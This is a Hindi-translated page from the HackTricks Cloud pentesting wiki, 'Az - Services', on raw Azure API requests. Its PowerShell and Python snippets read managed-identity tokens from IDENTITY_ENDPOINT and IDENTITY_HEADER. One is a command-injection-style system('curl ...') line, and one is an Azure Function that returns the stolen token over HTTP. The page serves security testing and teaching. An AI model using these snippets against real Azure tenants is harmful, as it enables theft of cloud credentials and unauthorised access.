Hindi - Ht Cloud

Az - Services

HackTricks को समर्थन दें

पोर्टल्स

आप Microsoft पोर्टल्स की सूची https://msportals.io/ पर पा सकते हैं।

Raw requests

Azure API via Powershell

IDENTITY_HEADER और IDENTITY_ENDPOINT से access_token प्राप्त करें: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

फिर Azure REST API को क्वेरी करें ताकि subscription ID और अधिक जानकारी प्राप्त हो सके।

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'

Python संस्करण के माध्यम से Azure API

import requests

# Azure AD टोकन प्राप्त करें
def get_azure_ad_token(tenant_id, client_id, client_secret):
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = {
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default"
    }
    response = requests.post(url, headers=headers, data=data)
    response.raise_for_status()
    return response.json()["access_token"]

# Azure API से डेटा प्राप्त करें
def get_azure_data(token, endpoint):
    headers = {
        "Authorization": f"Bearer {token}"
    }
    response = requests.get(endpoint, headers=headers)
    response.raise_for_status()
    return response.json()

# मुख्य कार्य
if __name__ == "__main__":
    tenant_id = "your_tenant_id"
    client_id = "your_client_id"
    client_secret = "your_client_secret"
    endpoint = "https://graph.microsoft.com/v1.0/users"

    token = get_azure_ad_token(tenant_id, client_id, client_secret)
    data = get_azure_data(token, endpoint)
    print(data)

यह स्क्रिप्ट Azure AD से टोकन प्राप्त करती है और फिर Azure API से डेटा प्राप्त करती है।

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

या एक Python Function के अंदर:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)

List of Services

इस अनुभाग के पृष्ठ Azure सेवा द्वारा क्रमबद्ध हैं। यहां आप सेवा के बारे में जानकारी (यह कैसे काम करता है और क्षमताएं) और प्रत्येक सेवा को कैसे सूचीबद्ध करें, पा सकते हैं।

HackTricks को समर्थन दें
PreviousAz - Password SprayingNextAz - ACR

Last updated